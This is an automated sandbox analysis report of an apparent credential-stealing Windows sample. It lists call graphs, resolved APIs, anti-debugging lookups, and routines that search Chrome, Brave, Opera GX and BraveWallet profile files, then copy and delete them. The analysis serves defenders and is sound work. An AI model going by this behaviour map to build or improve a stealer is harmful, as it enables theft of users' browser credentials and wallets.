4108f1 78579->78581 78582 4107c3 RegQueryValueExA 78579->78582 78580->78147 78585 40fd10 lstrcpy 78581->78585 78583 4107f3 lstrlenA 78582->78583 78582->78589 78583->78589 78584 40fe90 lstrlenA lstrcpy lstrcat 78584->78589 78586 410909 78585->78586 78586->78147 78587 40fdb0 lstrcpy 78587->78589 78588 41085c RegQueryValueExA 78588->78589 78589->78577 78589->78581 78589->78584 78589->78587 78589->78588 78591 415282 78590->78591 78592 40fdb0 lstrcpy 78591->78592 78593 4152cd 78592->78593 78594 40fdb0 lstrcpy 78593->78594 78595 4152eb 78594->78595 78596 40fdb0 lstrcpy 78595->78596 78597 4152f7 78596->78597 78598 40fdb0 lstrcpy 78597->78598 78599 415303 78598->78599 78600 415323 CreateThread WaitForSingleObject 78599->78600 78601 41530b 78599->78601 78603 40fcd0 lstrcpy 78600->78603 78621 413c30 78600->78621 78602 415310 Sleep 78601->78602 78602->78600 78602->78602 78604 415357 78603->78604 78604->78169 78606 410095 RegQueryValueExA 78605->78606 78607 4100ab 78605->78607 78606->78607 78607->78478 78609 410e47 SysAllocString 78608->78609 78610 410eae 78608->78610 78609->78610 78612 410e58 78609->78612 78610->78494 78611 410eaa SysFreeString 78611->78610 78612->78611 78613 410e8e _wtoi64 SysFreeString 78612->78613 78613->78611 78614->78508 78615->78547 78616->78547 78617->78540 78618->78546 78620 41055a GlobalMemoryStatusEx 78619->78620 78620->78554 78630 40ff70 78621->78630 78623 413c5f lstrlenA 78627 413c7a 78623->78627 78629 413c6f 78623->78629 78624 40fd10 lstrcpy 78624->78627 78626 40fdb0 lstrcpy 78626->78627 78627->78624 78627->78626 78628 413d29 StrCmpCA 78627->78628 78631 404d60 78627->78631 78628->78627 78628->78629 78630->78623 78632 40fd10 lstrcpy 78631->78632 78633 404d9e 78632->78633 78634 404350 5 API calls 78633->78634 78635 404daa 78634->78635 78835 4115e0 78635->78835 78637 404dda 78638 404de5 lstrlenA 78637->78638 78639 404df5 78638->78639 78640 4115e0 4 API calls 78639->78640 78641 404e03 78640->78641 78642 40fcd0 lstrcpy 78641->78642 78643 404e13 78642->78643 78644 40fcd0 lstrcpy 78643->78644 78645 404e24 78644->78645 78646 40fcd0 lstrcpy 78645->78646 78647 404e35 78646->78647 78648 40fcd0 lstrcpy 78647->78648 78649 404e46 78648->78649 78650 40fcd0 lstrcpy 78649->78650 78651 404e57 StrCmpCA 78650->78651 78652 404e7b 78651->78652 78653 411310 2 API calls 78652->78653 78660 4056ba 78652->78660 78654 404e98 78653->78654 78655 40fe00 2 API calls 78654->78655 78656 404eaf 78655->78656 78657 40fdb0 lstrcpy 78656->78657 78658 404ebc 78657->78658 78663 40fd10 lstrcpy 78660->78663 78674 40561a 78663->78674 78674->78627 78836 4115f3 CryptBinaryToStringA 78835->78836 78837 4115ec 78835->78837 78838 411629 78836->78838 78839 41160e GetProcessHeap HeapAlloc 78836->78839 78837->78637 78838->78637 78839->78838 78840 411631 CryptBinaryToStringA 78839->78840 78840->78637 78849->78176 78851 406c8c 78850->78851 79166 406b50 78851->79166 78853 406c9f 78853->78225 78855 40fcd0 lstrcpy 78854->78855 78856 40ded1 78855->78856 78907 40fcd0 lstrcpy 78906->78907 78908 40e201 78907->78908 79020 40fcd0 lstrcpy 79019->79020 79021 40ba70 79020->79021 79169 4069c0 79166->79169 79168 406b78 79168->78853 79170 4069d3 79169->79170 79171 4069db 79169->79171 79170->79168 79186 406480 79171->79186 79173 4069fb 79185 406a83 79173->79185 79192 406550 79173->79192 79185->79168 79188 40648c 79186->79188 79187 406493 79187->79173 79188->79187 79189 4064ed 79188->79189 79216 4112d0 GetProcessHeap HeapAlloc 79189->79216 79191 406502 79191->79173 79193 40659f VirtualAlloc 79192->79193 79194 40656f 79192->79194 79194->79193 79216->79191 80138 6c70b694 80139 6c70b6a0 ___scrt_is_nonwritable_in_current_image 80138->80139 80168 6c70af2a 80139->80168 80141 6c70b6a7 80142 6c70b6d1 80141->80142 80143 6c70b796 80141->80143 80147 6c70b6ac ___scrt_is_nonwritable_in_current_image 80141->80147 80172 6c70b064 80142->80172 80185 6c70b1f7 IsProcessorFeaturePresent 80143->80185 80146 6c70b6e0 __RTC_Initialize 80146->80147 80175 6c70bf89 InitializeSListHead 80146->80175 80148 6c70b7b3 ___scrt_uninitialize_crt __RTC_Initialize 80150 6c70b6ee ___scrt_initialize_default_local_stdio_options 80154 6c70b6f3 _initterm_e 80150->80154 80151 6c70b79d ___scrt_is_nonwritable_in_current_image 80151->80148 80152 6c70b7d2 80151->80152 80153 6c70b828 80151->80153 80189 6c70b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 80152->80189 80155 6c70b1f7 ___scrt_fastfail 6 API calls 80153->80155 80154->80147 80157 6c70b708 80154->80157 80158 6c70b82f 80155->80158 80176 6c70b072 80157->80176 80164 6c70b83b 80158->80164 80165 6c70b86e dllmain_crt_process_detach 80158->80165 80159 6c70b7d7 80190 6c70bf95 __std_type_info_destroy_list 80159->80190 80162 6c70b70d 80162->80147 80163 6c70b711 _initterm 80162->80163 80163->80147 80166 6c70b860 dllmain_crt_process_attach 80164->80166 80167 6c70b840 80164->80167 80165->80167 80166->80167 80169 6c70af33 80168->80169 80191 6c70b341 IsProcessorFeaturePresent 80169->80191 80171 6c70af3f ___scrt_uninitialize_crt 80171->80141 80192 6c70af8b 80172->80192 80174 6c70b06b 80174->80146 80175->80150 80177 6c70b077 ___scrt_release_startup_lock 80176->80177 80178 6c70b082 80177->80178 80179 6c70b07b 80177->80179 80182 6c70b087 _configure_narrow_argv 80178->80182 80202 6c70b341 IsProcessorFeaturePresent 80179->80202 80181 6c70b080 80181->80162 80183 6c70b092 80182->80183 80184 6c70b095 _initialize_narrow_environment 80182->80184 80183->80162 80184->80181 80186 6c70b20c ___scrt_fastfail 80185->80186 80187 6c70b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 80186->80187 80188 6c70b302 ___scrt_fastfail 80187->80188 80188->80151 80189->80159 80190->80148 80191->80171 80193 6c70af9a 80192->80193 80194 6c70af9e 80192->80194 80193->80174 80195 6c70b028 80194->80195 80198 6c70afab ___scrt_release_startup_lock 80194->80198 80196 6c70b1f7 ___scrt_fastfail 6 API calls 80195->80196 80197 6c70b02f 80196->80197 80199 6c70afb8 _initialize_onexit_table 80198->80199 80200 6c70afd6 80198->80200 80199->80200 80201 6c70afc7 _initialize_onexit_table 80199->80201 80200->80174 80201->80200 80202->80181 80203 6c6d3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 80208 6c70ab2a 80203->80208 80207 6c6d30db 80212 6c70ae0c _crt_atexit _register_onexit_function 80208->80212 80210 6c6d30cd 80211 6c70b320 5 API calls ___raise_securityfailure 80210->80211 80211->80207 80212->80210 80213 6c6d35a0 80214 6c6d35c4 InitializeCriticalSectionAndSpinCount getenv 80213->80214 80229 6c6d3846 __aulldiv 80213->80229 80216 6c6d38fc strcmp 80214->80216 80220 6c6d35f3 __aulldiv 80214->80220 80218 6c6d3912 strcmp 80216->80218 80216->80220 80217 6c6d38f4 80218->80220 80219 6c6d35f8 QueryPerformanceFrequency 80219->80220 80220->80219 80221 6c6d3622 _strnicmp 80220->80221 80222 6c6d3944 _strnicmp 80220->80222 80224 6c6d395d 80220->80224 80225 6c6d3664 GetSystemTimeAdjustment 80220->80225 80227 6c6d375c 80220->80227 80221->80220 80221->80222 80222->80220 80222->80224 80223 6c6d376a QueryPerformanceCounter EnterCriticalSection 80226 6c6d37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 80223->80226 80223->80227 80225->80220 80226->80227 80228 6c6d37fc LeaveCriticalSection 80226->80228 80227->80223 80227->80226 80227->80228 80227->80229 80228->80227 80228->80229 80230 6c70b320 5 API calls ___raise_securityfailure 80229->80230 80230->80217 80231 6c6ec930 GetSystemInfo VirtualAlloc 80232 6c6ec9a3 GetSystemInfo 80231->80232 80233 6c6ec973 80231->80233 80235 6c6ec9b6 80232->80235 80236 6c6ec9d0 80232->80236 80247 6c70b320 5 API calls ___raise_securityfailure 80233->80247 80235->80236 80237 6c6ec9bd 80235->80237 80236->80233 80238 6c6ec9d8 VirtualAlloc 80236->80238 80237->80233 80240 6c6ec9c1 VirtualFree 80237->80240 80241 6c6ec9ec 80238->80241 80242 6c6ec9f0 80238->80242 80239 6c6ec99b 80240->80233 80241->80233 80248 6c70cbe8 GetCurrentProcess TerminateProcess 80242->80248 80247->80239 80249 6c70b8ae 80252 6c70b8ba ___scrt_is_nonwritable_in_current_image 80249->80252 80250 6c70b8c9 80251 6c70b8e3 dllmain_raw 80251->80250 80253 6c70b8fd dllmain_crt_dispatch 80251->80253 80252->80250 80252->80251 80254 6c70b8de 80252->80254 80253->80250 80253->80254 80262 6c6ebed0 DisableThreadLibraryCalls LoadLibraryExW 80254->80262 80256 6c70b91e 80257 6c70b94a 80256->80257 80263 6c6ebed0 DisableThreadLibraryCalls LoadLibraryExW 80256->80263 80257->80250 80258 6c70b953 dllmain_crt_dispatch 80257->80258 80258->80250 80260 6c70b966 dllmain_raw 80258->80260 80260->80250 80261 6c70b936 dllmain_crt_dispatch dllmain_raw 80261->80257 80262->80256 80263->80261

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 004181D0 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 208libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 551 4181d0-4181e2 LoadLibraryA 552 4183f7-418456 LoadLibraryA * 5 551->552 553 4181e8-4183f2 GetProcAddress * 21 551->553 554 418458-418466 GetProcAddress 552->554 555 41846b-418472 552->555 553->552 554->555 557 418474-41849a GetProcAddress * 2 555->557 558 41849f-4184a6 555->558 557->558 559 4184a8-4184b6 GetProcAddress 558->559 560 4184bb-4184c2 558->560 559->560 561 4184c4-4184d2 GetProcAddress 560->561 562 4184d7-4184de 560->562 561->562 563 4184e0-418505 GetProcAddress * 2 562->563 564 41850a 562->564 563->564
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,004180E0), ref: 004181D5
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,015BF468), ref: 004181F0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF1F8), ref: 0041821D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF210), ref: 00418236
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF1E0), ref: 0041824E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF480), ref: 00418266
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2F60), ref: 0041827F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C29E0), ref: 00418297
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2C20), ref: 004182AF
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF4B0), ref: 004182C8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF498), ref: 004182E0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF4C8), ref: 004182F8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF528), ref: 00418311
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2A80), ref: 00418329
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF540), ref: 00418341
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF4E0), ref: 0041835A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2C40), ref: 00418372
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF4F8), ref: 0041838A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BF510), ref: 004183A3
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2B00), ref: 004183BB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015BCAB8), ref: 004183D3
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2D00), ref: 004183EC
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015CDAE0), ref: 004183FD
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015CD978), ref: 0041840F
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015CDB28), ref: 00418421
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015CDB70), ref: 00418432
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015CDA20), ref: 00418444
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015CDA38), ref: 00418460
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015CDAC8), ref: 0041847C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015CDA08), ref: 00418494
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015CD8E8), ref: 004184B0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75450000,015C2CA0), ref: 004184CC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76E90000,015C2DA0), ref: 004184E8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004184FF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: NtQueryInformationProcess$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 2238633743-258108907
                                                                                                                                                                                                                                                    • Opcode ID: 70d1d3362bf3008d9a52891ea37fcc0450c629604f46aa634aabf3581718c65a
                                                                                                                                                                                                                                                    • Instruction ID: 18c1e4bf9447220ee0ff3f0e00010877e56fcb6e4a79cc5337be227af6316b6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70d1d3362bf3008d9a52891ea37fcc0450c629604f46aa634aabf3581718c65a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C59144BDA00620EFE755DFA4ED48A2637BBF74AB01B106529EA05C7370EB749841CF64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00416310 Relevance: 51.1, APIs: 23, Strings: 6, Instructions: 322stringfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1369 416310-416396 call 419100 wsprintfA FindFirstFileA memset * 2 1372 4163b0-4163b6 1369->1372 1373 416398-4163ab call 40fd50 1369->1373 1375 4163c0-4163d4 StrCmpCA 1372->1375 1379 41670a-416731 call 40fd50 * 2 1373->1379 1377 4166d4-4166e7 FindNextFileA 1375->1377 1378 4163da-4163ee StrCmpCA 1375->1378 1377->1375 1381 4166ed-416706 FindClose call 40fd50 1377->1381 1378->1377 1380 4163f4-416425 wsprintfA StrCmpCA 1378->1380 1383 416450-41646d wsprintfA 1380->1383 1384 416427-41644e wsprintfA 1380->1384 1381->1379 1388 416470-4164b0 memset lstrcat strtok_s 1383->1388 1384->1388 1389 4164b2-4164c3 1388->1389 1390 4164df-41651c memset lstrcat strtok_s 1388->1390 1392 416671-416676 1389->1392 1399 4164c9-4164dd strtok_s 1389->1399 1390->1392 1393 416522-416532 PathMatchSpecA 1390->1393 1392->1377 1396 416678-416686 1392->1396 1397 4165c4-4165d8 strtok_s 1393->1397 1398 416538-4165c2 call 411310 wsprintfA call 40fd50 call 411790 call 4192a0 1393->1398 1396->1381 1401 416688-416690 1396->1401 1397->1393 1400 4165de 1397->1400 1398->1397 1417 4165e3-4165ee 1398->1417 1399->1389 1399->1390 1400->1392 1401->1377 1403 416692-4166c9 call 401060 call 416310 1401->1403 1410 4166ce 1403->1410 1410->1377 1418 416732-416745 call 40fd50 1417->1418 1419 4165f4-41661a call 40fcd0 call 406d60 1417->1419 1418->1379 1426 416664-41666a 1419->1426 1427 41661c-41665f call 40fcd0 call 401060 call 415250 call 40fd50 1419->1427 1426->1392 1427->1426
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*$2iA
                                                                                                                                                                                                                                                    • API String ID: 1425701045-4139583097
                                                                                                                                                                                                                                                    • Opcode ID: 7cbb2d5761f4a8bc48562a8c6c69247b2f0357e9c585ea0f3af39c2a6346f440
                                                                                                                                                                                                                                                    • Instruction ID: d5ba680260b222a762d84d7fa9107e161f6eca100296f6be478e7b18dfc97a61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cbb2d5761f4a8bc48562a8c6c69247b2f0357e9c585ea0f3af39c2a6346f440
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C1E8B5900219EBDB10EFA4DC85EEE7779EF48704F10855EF505A3281DB389E88CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040D200 Relevance: 46.4, APIs: 18, Strings: 8, Instructions: 907fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1435 40d200-40d2c2 call 40fcd0 call 40fe00 call 40fe90 call 40fdb0 call 40fd50 * 2 call 40fcd0 * 2 call 40ff70 FindFirstFileA 1454 40d2c4-40d2f8 call 40fd50 * 4 1435->1454 1455 40d2fd-40d309 1435->1455 1481 40de4a-40de95 call 40fd50 * 5 1454->1481 1457 40d310-40d324 StrCmpCA 1455->1457 1458 40ddf9-40de09 FindNextFileA 1457->1458 1459 40d32a-40d33e StrCmpCA 1457->1459 1458->1457 1463 40de0f-40de46 FindClose call 40fd50 * 4 1458->1463 1459->1458 1461 40d344-40d3d0 call 40fd60 call 40fe00 call 40fe90 * 2 call 40fdb0 call 40fd50 * 3 1459->1461 1504 40d536-40d5cd call 40fe90 * 4 call 40fdb0 call 40fd50 * 3 1461->1504 1505 40d3d6-40d3ec call 40ff70 StrCmpCA 1461->1505 1463->1481 1554 40d5d3-40d5f2 call 40fd50 call 40ff70 StrCmpCA 1504->1554 1510 40d3f2-40d48f call 40fe90 * 4 call 40fdb0 call 40fd50 * 3 1505->1510 1511 40d494-40d531 call 40fe90 * 4 call 40fdb0 call 40fd50 * 3 1505->1511 1510->1554 1511->1554 1563 40d7c8-40d7de StrCmpCA 1554->1563 1564 40d5f8-40d60c StrCmpCA 1554->1564 1565 40d7e0-40d83c call 401060 call 40fd10 * 3 call 40cdf0 1563->1565 1566 40d84c-40d861 StrCmpCA 1563->1566 1564->1563 1567 40d612-40d743 call 40fcd0 call 411310 call 40fe90 call 40fe00 call 40fdb0 call 40fd50 * 3 call 40ff70 * 2 call 40fcd0 call 40fe90 * 2 call 40fdb0 call 40fd50 * 2 call 40fd10 call 406d60 1564->1567 1622 40d841-40d847 1565->1622 1568 40d863-40d87b call 40ff70 StrCmpCA 1566->1568 1569 40d8d8-40d8f3 call 40fd10 call 4114d0 1566->1569 1749 40d791-40d7c3 call 40ff70 call 40ff20 call 40ff70 call 40fd50 * 2 1567->1749 1750 40d745-40d78c call 40fd10 call 401060 call 415250 call 40fd50 1567->1750 1582 40d881-40d885 1568->1582 1583 40dd6b-40dd72 1568->1583 1594 40d8f5-40d8f9 1569->1594 1595 40d96f-40d984 StrCmpCA 1569->1595 1582->1583 1589 40d88b-40d8d6 call 401060 call 40fd10 * 2 1582->1589 1587 40dd74-40dddb call 40fd10 * 2 call 40fcd0 call 401060 call 40d200 1583->1587 1588 40dde6-40ddf6 call 40ff20 * 2 1583->1588 1653 40dde0 1587->1653 1588->1458 1636 40d94d-40d95f call 40fd10 call 407320 1589->1636 1594->1583 1603 40d8ff-40d94a call 401060 call 40fd10 call 40fcd0 1594->1603 1599 40d98a-40da3b call 40fcd0 call 40fe90 call 40fdb0 call 40fd50 call 411310 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40ff70 * 2 CopyFileA 1595->1599 1600 40dbac-40dbc1 StrCmpCA 1595->1600 1699 40da41-40db0b call 401060 call 40fd10 * 3 call 407ab0 call 401060 call 40fd10 * 3 call 408610 1599->1699 1700 40db0d 1599->1700 1600->1583 1608 40dbc7-40dc78 call 40fcd0 call 40fe90 call 40fdb0 call 40fd50 call 411310 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40ff70 * 2 CopyFileA 1600->1608 1603->1636 1705 40dd48-40dd5a call 40ff70 DeleteFileA call 40ff20 1608->1705 1706 40dc7e-40dcdb call 401060 call 40fd10 * 3 call 407ea0 1608->1706 1622->1583 1657 40d964-40d96a 1636->1657 1653->1588 1657->1583 1703 40db13-40db29 call 40ff70 StrCmpCA 1699->1703 1700->1703 1719 40db2b-40db87 call 401060 call 40fd10 * 3 call 408ca0 1703->1719 1720 40db8d-40db9f call 40ff70 DeleteFileA call 40ff20 1703->1720 1729 40dd5f 1705->1729 1758 40dce0-40dd42 call 401060 call 40fd10 * 3 call 408210 1706->1758 1719->1720 1742 40dba4-40dba7 1720->1742 1735 40dd62-40dd66 call 40fd50 1729->1735 1735->1583 1742->1735 1749->1563 1750->1749 1758->1705
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,004268BA,004268B7,00000000,?,004269F8,?,?,004268B6,?,00000000,00000005), ref: 0040D2B4
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004269FC), ref: 0040D31C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426A00), ref: 0040D336
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426A04,?,?,004268BB), ref: 0040D3E4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                    • String ID: Brave$E$Google Chrome$Opera GX$Preferences$P@$P@E$\BraveWallet\Preferences
                                                                                                                                                                                                                                                    • API String ID: 2567437900-2661835735
                                                                                                                                                                                                                                                    • Opcode ID: c17fe3ac07d3a1808e4c42e25419f8a8a3b47574ca1df38f20384f4c07d1ece4
                                                                                                                                                                                                                                                    • Instruction ID: 289820316e2a5b626ce048e4d25aa0d66498e96cbb14d5f7458f06e1ce0eb246
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c17fe3ac07d3a1808e4c42e25419f8a8a3b47574ca1df38f20384f4c07d1ece4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB827270900248EADB15EBB5C946BDDBBB86F55704F1080BEE445736C2DB782B4CCBA6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00404420 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537networkfilestringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
